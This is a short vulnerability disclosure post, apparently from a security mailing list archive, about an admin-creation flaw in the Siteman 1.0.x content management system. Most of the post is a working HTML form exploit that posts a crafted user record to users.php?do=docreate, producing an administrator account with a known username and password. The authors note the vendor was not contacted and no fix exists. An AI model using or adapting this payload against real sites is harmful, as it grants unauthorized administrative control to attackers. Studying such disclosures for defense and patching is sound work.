<<< Date Index >>>     <<< Thread Index >>>

God Admin Injection Vulnerability in Siteman 1.0.x


God Admin Injection Vulnerability in Siteman 1.0.x,

Discovered by PersianHacker.NET Security Team
by amironline452 (amironline452 hotmail com)
http://www.PersianHacker.NET
http://www.amironline452.tk 

Siteman is a Content Management System (CMS) that is so easy to install and 
use, that
a person who has no knowledge about creating homepages can get a profesionally
looking website up and running in just minutes.

More info @ 
http://sitem.sourceforge.net/
http://sourceforge.net/projects/sitem/

Discussion:
With this Vulnerability you can create God Admin user in Siteman v1.0.x.

Exploiet:
<html>
<b>These data were recorded.</b><br /><br /><table cellspacing="0" 
cellpadding="2"><tr><td>Username(Use this, and not your display name, 
when 
logging in)</td><td 
align="right">amir452</td></tr><tr><td>Password</td><td 
align="right"><form><select><option>Click to show password</option>
                                        
<option>amir452</option></select></form></td></tr><tr><td>Secret 
Question (Asked when you forget your password)</td><td 
align="right">amir452</td></tr><tr><td>Answer to secret 
question</td><td 
align="right"><form>
<select>
<option>Click to show answer</option>
<option>amir452</option>
</select></form>
</td></tr><tr><td>Display name</td><td 
align="right">amir452</td></tr><tr><td>Member Level</td><td 
align="right"><b>5</b> (Admin)</td></tr><tr><td>email</td><td 
align="right">amir452@xxxxxxxxxxx</td></tr><tr><td>Hide my email 
adress</td><td align="right">no</td></tr><tr><td>Forum 
Signature</td><td 
align="right">hackers</td></table><br /><br />Is this correct?<br 
/><table 
cellspacing="0" cellpadding="3"><tr><td>

<form action="users.php?do=new" method="post"><input type="submit" 
value="no" /></form></td><td>

<form action="http://www.example.com/users.php?do=docreate"; 
method="post">
                                        <input type="hidden" name="line" 
value="amir452|347a9a8a8d3f364f0bdb82c4208a3207|5|amir452@xxxxxxxxxxx|amir452|1105956827|amir452|347a9a8a8d3f364f0bdb82c4208a3207|0|0|0|hackers"
 
/><input type="submit" value="yes" /></form></html>

the above exploiet creat God Admin user with folowing info:
username: amir452
password: amir452

Note:
Script authors  not contacted.
There is no solution at this time.